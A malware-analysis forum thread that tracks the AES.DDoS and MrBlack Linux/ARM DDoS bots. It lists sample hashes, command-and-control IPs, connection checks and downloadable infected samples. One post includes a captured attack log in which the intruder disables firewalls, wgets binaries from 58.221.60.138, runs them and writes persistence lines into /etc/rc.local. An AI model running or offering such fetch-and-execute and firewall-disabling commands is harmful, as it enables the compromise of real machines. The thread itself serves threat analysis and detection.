A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #26760  by unixfreaxjp
 Sat Sep 19, 2015 8:16 am
Nice combination of Mr.Black & AES.DDoS in one panel.. :)
Image
Report:
Code: Select all
//  Name             Hashes                              MalwareName & Arch
    1. (2O16I1)    = c86fe64d074a7255968504be5aca8102 // mrblack.ddos ARM
    2. (312vt)     = 0005983da39751deb80264b10f7e16b0 // AES.DDoS ARM
    3. (scaqq)     = 60b25f9c03eca8dee74649d2f0ce3cf0 // AES.ddos ARM
// Files:
   2O16I1:   unpacked, ELF 32-bit LSB executable, ARM, EABI4 (SYSV), static, stripped
   312vt:     packed, ELF 32-bit LSB executable, ARM, EABI5 (GNU/Linux), static, stripped
   scaqq:     packed, ELF 32-bit LSB executable, ARM, EABI5 (GNU/Linux), static, stripped
cnc: 222.186.34.220 attacker: 60.166.61.110
Attachments
7z/infected
(549.54 KiB) Downloaded 65 times
 #26950  by unixfreaxjp
 Wed Oct 14, 2015 9:49 pm
This is AES.DDoS router (ARM) version, NOT MrBlack < pls noted this although the route of codes for both malware are the same.
Attacker/panel: 59.56.110.233:8081
CNC (IP basis) 59.56.110.233 port 48080
CNC is open PoC:
Code: Select all
Thu Oct 15 06:39:21 JST 2015
233.110.56.59.in-addr.arpa [59.56.110.233] 48080 (http) open
Connection to 59.56.110.233 48080 port [tcp/48080] succeeded! 
Sample: https://www.virustotal.com/en/file/d0cc ... 444858548/
Attachments
7z/infected
(380.82 KiB) Downloaded 60 times
 #26973  by unixfreaxjp
 Thu Oct 15, 2015 10:17 pm
Double panel same payloads at 123.249.29.244 and 115.230.124.153 w/ ssh attacker from 115.230.124.153
Image
CNC is 123.249.29.244:11024
Code: Select all
Int Server...
connect to server...
---server 123.249.29.244:11024---
---server 123.249.29.244:11024 (4095605115:4139)---
(UNKNOWN) [123.249.29.244] 11024 (?) open
Connection to 123.249.29.244 11024 port [tcp/*] succeeded!
READAS.MMD-KICKASS-SCUM.ORG TCP ->123.249.29.244:11024 (ESTABLISHED)
https://www.virustotal.com/en/file/e1ea ... 444947243/
Attachments
7z/infected
(169.21 KiB) Downloaded 52 times
 #27017  by unixfreaxjp
 Tue Oct 20, 2015 2:16 am
This is AES.DDoSer, for ARM and intel
https://www.virustotal.com/en/file/5c56 ... 445306739/
https://www.virustotal.com/en/file/58f7 ... 445306725/
attack log:
Code: Select all
2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] Remote SSH version: SSH-2.0-libssh2_1.4.3
2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] outgoing: aes128-ctr hmac-sha1 none
2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] incoming: aes128-ctr hmac-sha1 none
2015-10-20 10:12:29 sess/ip=2953,58.221.60.138] login attempt [admin/admin] succeeded
2015-10-20 10:12:33 sess/ip=2953,58.221.60.138] SHELL: /etc/init.d/iptables stop
2015-10-20 10:12:37 sess/ip=2953,58.221.60.138] SHELL: service iptables stop
2015-10-20 10:12:41 sess/ip=2953,58.221.60.138] SHELL: SuSEfirewall2 stop
2015-10-20 10:12:45 sess/ip=2953,58.221.60.138] SHELL: reSuSEfirewall2 stop
2015-10-20 10:12:49 sess/ip=2953,58.221.60.138] SHELL: cd /tmp
2015-10-20 10:12:53 sess/ip=2953,58.221.60.138] SHELL: wget -c http://58.221.60.138:50000/linux-arm
2015-10-20 10:12:57 sess/ip=2953,58.221.60.138] SHELL: chmod 777 linux-arm
2015-10-20 10:13:02 sess/ip=2953,58.221.60.138] SHELL: ./linux-arm &
2015-10-20 10:13:05 sess/ip=2953,58.221.60.138] SHELL: wget -c http://58.221.60.138:50000/Linux2.6
2015-10-20 10:13:19 sess/ip=2953,58.221.60.138] SHELL: chmod 777 Linux2.6
2015-10-20 10:13:19 sess/ip=2953,58.221.60.138] SHELL: ./Linux2.6 &
2015-10-20 10:13:19 sess/ip=2953,58.221.60.138] SHELL: echo "cd /tmp/">>/etc/rc.local
2015-10-20 10:13:26 sess/ip=2953,58.221.60.138] SHELL: echo "/etc/init.d/iptables stop">>/etc/rc.local
CNC checks, both are on same IP and ports as per attacker and its panel..
Code: Select all
linux-arm: ELF 32-bit LSB executable, ARM, version 1 (GNU/Linux), statically linked, stripped
538c8a700e6299258380b9d7eff4ee31 linux-arm
open temporary file /etc/sede1dRLk
open temporary file /etc/sednbbFbg
read /etc/rc.d/rc.local
read /etc/init.d/boot.local
Connecting to 58.221.60.138 50050 port ..
(UNKNOWN) 58.221.60.138 50050 (?) open
Connection to 58.221.60.138 50050 port succeeded!
TCP MMD-KICKS-AESDDOS->58.221.60.138:50050 (ESTABLISHED)
VERSONEX:MMD-KICKS-AESDDOS|0|0 MHz|XXXMB|XXXMB|Hacker
INFO:0.5%|0.0XX Mbps
INFO:0.6%|0.0XX Mbps
infection pace is high..
Image
#MalwareMustDie!!
Attachments
7z/infected
(1.07 MiB) Downloaded 64 times
 #27841  by unixfreaxjp
 Wed Feb 10, 2016 8:08 am
Memo:
AES.DDoS attack switch latest version (case switch 0x01 to 0x0C)
Image
Typical MO:
Code: Select all
/etc/sed[a-zA-Z0-9]{5}
/etc/rc.d/rc.local
/etc/init.d/boot.local
Network:
Code: Select all
CNC: 115.231.219.147:48080 (ip base) AS4134 ChinaNet-ZJ Shaoxing
PNL: 222.186.26.121:443 (hacked victim) AS23650 ChinaNet Jiangsu
Note:
Do make sig from this sample, and your product can detect all of the AES.DDoS varients correctly w/o mixing with MrBlack.
Reversing some flood techniques is good to mitigate them like this.

#MalwareMustDie
Attachments
7z/infected
(639.32 KiB) Downloaded 50 times